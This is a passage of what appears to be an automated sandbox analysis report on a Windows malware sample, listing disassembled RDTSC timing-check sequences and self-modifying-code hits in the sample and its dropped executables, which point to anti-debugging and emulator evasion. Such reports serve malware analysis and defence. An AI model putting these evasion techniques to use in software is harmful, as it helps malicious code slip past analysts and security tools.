Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E70136 second address: 4E7015D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77291E595Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c pushad 0x0000000d mov cl, A6h 0x0000000f mov eax, edx 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F77291E595Bh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E7015D second address: 4E701BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F772874F649h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b movzx ecx, dx 0x0000000e mov edi, 620F808Ch 0x00000013 popad 0x00000014 mov ebx, dword ptr [ebp+10h] 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov ax, CA53h 0x0000001e pushfd 0x0000001f jmp 00007F772874F648h 0x00000024 jmp 00007F772874F645h 0x00000029 popfd 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E701BF second address: 4E701E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77291E5961h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F77291E595Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E701E4 second address: 4E701EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E701EA second address: 4E701EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E701EE second address: 4E70202 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov edi, 06F57CD6h 0x00000011 mov cl, dh 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E70202 second address: 4E70236 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, dl 0x00000005 call 00007F77291E5960h 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, esi 0x0000000f jmp 00007F77291E5961h 0x00000014 mov esi, dword ptr [ebp+08h] 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E70236 second address: 4E7023A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E7023A second address: 4E7023E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E7023E second address: 4E70244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E70244 second address: 4E7024A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E7024A second address: 4E7024E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E7024E second address: 4E702ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77291E595Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c pushad 0x0000000d mov esi, 0C98B35Dh 0x00000012 pushfd 0x00000013 jmp 00007F77291E595Ah 0x00000018 adc ecx, 35AA07B8h 0x0000001e jmp 00007F77291E595Bh 0x00000023 popfd 0x00000024 popad 0x00000025 push eax 0x00000026 jmp 00007F77291E5969h 0x0000002b xchg eax, edi 0x0000002c pushad 0x0000002d mov edi, esi 0x0000002f jmp 00007F77291E5968h 0x00000034 popad 0x00000035 test esi, esi 0x00000037 jmp 00007F77291E5960h 0x0000003c je 00007F779B293C9Dh 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F77291E5967h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E702ED second address: 4E702F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E702F3 second address: 4E702F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E702F7 second address: 4E7033A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000000f jmp 00007F772874F647h 0x00000014 je 00007F779A7FD944h 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F772874F645h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E7033A second address: 4E703E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, bh 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov edx, dword ptr [esi+44h] 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F77291E5962h 0x00000014 add ax, B5F8h 0x00000019 jmp 00007F77291E595Bh 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007F77291E5968h 0x00000025 adc ax, 9058h 0x0000002a jmp 00007F77291E595Bh 0x0000002f popfd 0x00000030 popad 0x00000031 or edx, dword ptr [ebp+0Ch] 0x00000034 jmp 00007F77291E5966h 0x00000039 test edx, 61000000h 0x0000003f pushad 0x00000040 mov di, si 0x00000043 pushfd 0x00000044 jmp 00007F77291E595Ah 0x00000049 adc ecx, 1F66A1E8h 0x0000004f jmp 00007F77291E595Bh 0x00000054 popfd 0x00000055 popad 0x00000056 jne 00007F779B293C06h 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f push edx 0x00000060 pushad 0x00000061 popad 0x00000062 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E703E4 second address: 4E703EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E608E5 second address: 4E608F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77291E595Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E608F4 second address: 4E6090C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F772874F644h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E6090C second address: 4E60910 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E60910 second address: 4E60930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov dh, ch 0x0000000c mov eax, edx 0x0000000e popad 0x0000000f mov dword ptr [esp], ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F772874F63Ch 0x00000019 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E60930 second address: 4E6098C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77291E595Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F77291E5966h 0x00000010 and esp, FFFFFFF8h 0x00000013 jmp 00007F77291E5960h 0x00000018 xchg eax, ebx 0x00000019 jmp 00007F77291E5960h 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F77291E595Eh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E6098C second address: 4E609B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 mov ecx, 1E265FE9h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebx 0x0000000f jmp 00007F772874F644h 0x00000014 xchg eax, esi 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E609B8 second address: 4E609D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F77291E5965h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E609D1 second address: 4E609D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E60B07 second address: 4E60B0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E60B0B second address: 4E60B48 instructions: 0x00000000 rdtsc 0x00000002 mov edi, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 test byte ptr [76FA6968h], 00000002h 0x0000000e jmp 00007F772874F640h 0x00000013 jne 00007F779A804EC3h 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F772874F647h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E60B48 second address: 4E60BDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77291E5969h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+0Ch] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F77291E595Ch 0x00000013 add si, CA08h 0x00000018 jmp 00007F77291E595Bh 0x0000001d popfd 0x0000001e push ecx 0x0000001f pushfd 0x00000020 jmp 00007F77291E595Fh 0x00000025 and al, 0000004Eh 0x00000028 jmp 00007F77291E5969h 0x0000002d popfd 0x0000002e pop eax 0x0000002f popad 0x00000030 push eax 0x00000031 jmp 00007F77291E595Ch 0x00000036 mov dword ptr [esp], ebx 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c jmp 00007F77291E595Dh 0x00000041 push eax 0x00000042 pop ebx 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E60BDA second address: 4E60BE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E60BE0 second address: 4E60BE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E70CD8 second address: 4E70CF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, ax 0x00000006 jmp 00007F772874F640h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E70CF8 second address: 4E70CFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E70CFE second address: 4E70D04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E70D04 second address: 4E70D08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E70A42 second address: 4E70AB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F772874F641h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov ebx, 5323A452h 0x00000010 pushad 0x00000011 jmp 00007F772874F649h 0x00000016 pushfd 0x00000017 jmp 00007F772874F640h 0x0000001c jmp 00007F772874F645h 0x00000021 popfd 0x00000022 popad 0x00000023 popad 0x00000024 xchg eax, ebp 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F772874F63Dh 0x0000002c rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E70AB1 second address: 4E70AB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E70AB7 second address: 4E70ABB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E70ABB second address: 4E70ABF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E70ABF second address: 4E70ADE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F772874F641h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E70ADE second address: 4E70AE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E70AE2 second address: 4E70AE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E70AE8 second address: 4E70AEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E70AEE second address: 4E70B08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F772874F63Eh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4EF0015 second address: 4EF0075 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77291E5961h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F77291E595Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F77291E595Ch 0x00000019 add ax, 96A8h 0x0000001e jmp 00007F77291E595Bh 0x00000023 popfd 0x00000024 call 00007F77291E5968h 0x00000029 pop eax 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4EF0075 second address: 4EF00C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F772874F640h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ebx, 77366250h 0x00000012 pushfd 0x00000013 jmp 00007F772874F649h 0x00000018 adc ax, 32D6h 0x0000001d jmp 00007F772874F641h 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4EF00C4 second address: 4EF00F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77291E5961h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e movsx ebx, ax 0x00000011 jmp 00007F77291E5964h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4EE041D second address: 4EE0422 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4EE0422 second address: 4EE04D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F77291E5965h 0x0000000a or cx, D376h 0x0000000f jmp 00007F77291E5961h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, ebp 0x00000019 pushad 0x0000001a pushad 0x0000001b mov eax, 3858D3B9h 0x00000020 mov esi, 19A9F275h 0x00000025 popad 0x00000026 push esi 0x00000027 call 00007F77291E5961h 0x0000002c pop eax 0x0000002d pop edi 0x0000002e popad 0x0000002f push eax 0x00000030 pushad 0x00000031 mov dx, 3FE0h 0x00000035 pushfd 0x00000036 jmp 00007F77291E5969h 0x0000003b adc ax, 48E6h 0x00000040 jmp 00007F77291E5961h 0x00000045 popfd 0x00000046 popad 0x00000047 xchg eax, ebp 0x00000048 pushad 0x00000049 push eax 0x0000004a push edx 0x0000004b pushfd 0x0000004c jmp 00007F77291E595Ah 0x00000051 xor esi, 1CDAF488h 0x00000057 jmp 00007F77291E595Bh 0x0000005c popfd 0x0000005d rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4EE022F second address: 4EE02BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F772874F649h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F772874F641h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 mov ecx, 49C703A3h 0x00000016 pushfd 0x00000017 jmp 00007F772874F648h 0x0000001c jmp 00007F772874F645h 0x00000021 popfd 0x00000022 popad 0x00000023 mov ebp, esp 0x00000025 jmp 00007F772874F63Eh 0x0000002a pop ebp 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F772874F647h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E80124 second address: 4E8012A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E8012A second address: 4E8012E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E8012E second address: 4E8015A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F77291E5960h 0x0000000e push eax 0x0000000f jmp 00007F77291E595Bh 0x00000014 xchg eax, ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E8015A second address: 4E8015E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E8015E second address: 4E80164 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E80164 second address: 4E80176 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop edx 0x00000005 push esi 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E80176 second address: 4E80189 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77291E595Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E80189 second address: 4E801B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F772874F649h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F772874F63Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E801B6 second address: 4E801C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F77291E595Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E801C6 second address: 4E801CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4EE06BF second address: 4EE06D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F77291E5960h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4EE06D3 second address: 4EE0704 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 jmp 00007F772874F63Ch 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F772874F647h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4EE0704 second address: 4EE07E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77291E5969h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F77291E595Eh 0x00000010 push dword ptr [ebp+0Ch] 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F77291E595Eh 0x0000001a xor cx, FCE8h 0x0000001f jmp 00007F77291E595Bh 0x00000024 popfd 0x00000025 mov dh, ch 0x00000027 popad 0x00000028 push dword ptr [ebp+08h] 0x0000002b pushad 0x0000002c mov edi, 551775C4h 0x00000031 pushfd 0x00000032 jmp 00007F77291E595Dh 0x00000037 sub cx, AB06h 0x0000003c jmp 00007F77291E5961h 0x00000041 popfd 0x00000042 popad 0x00000043 push E70F3AB1h 0x00000048 pushad 0x00000049 call 00007F77291E595Dh 0x0000004e jmp 00007F77291E5960h 0x00000053 pop esi 0x00000054 pushad 0x00000055 pushfd 0x00000056 jmp 00007F77291E5961h 0x0000005b sbb cx, CDC6h 0x00000060 jmp 00007F77291E5961h 0x00000065 popfd 0x00000066 mov si, 7A77h 0x0000006a popad 0x0000006b popad 0x0000006c add dword ptr [esp], 18F1C551h 0x00000073 push eax 0x00000074 push edx 0x00000075 push eax 0x00000076 push edx 0x00000077 pushad 0x00000078 popad 0x00000079 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4EE07E8 second address: 4EE07EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4EE07EE second address: 4EE07FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F77291E595Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4EE084B second address: 4EE0862 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F772874F643h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4EE0862 second address: 4EE087A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F77291E5964h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4EE087A second address: 4EE0895 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F772874F63Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f movsx ebx, ax 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Special instruction interceptor: First address: 54E8DA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Special instruction interceptor: First address: 54E99D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Special instruction interceptor: First address: 79164B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: EEE8DA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: EEE99D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 113164B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Special instruction interceptor: First address: 833B9A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Special instruction interceptor: First address: 831502 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Special instruction interceptor: First address: 833C33 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Special instruction interceptor: First address: A63618 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Special instruction interceptor: First address: C1E516 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Special instruction interceptor: First address: C458B6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Special instruction interceptor: First address: A719DE instructions caused by: Self-modifying code
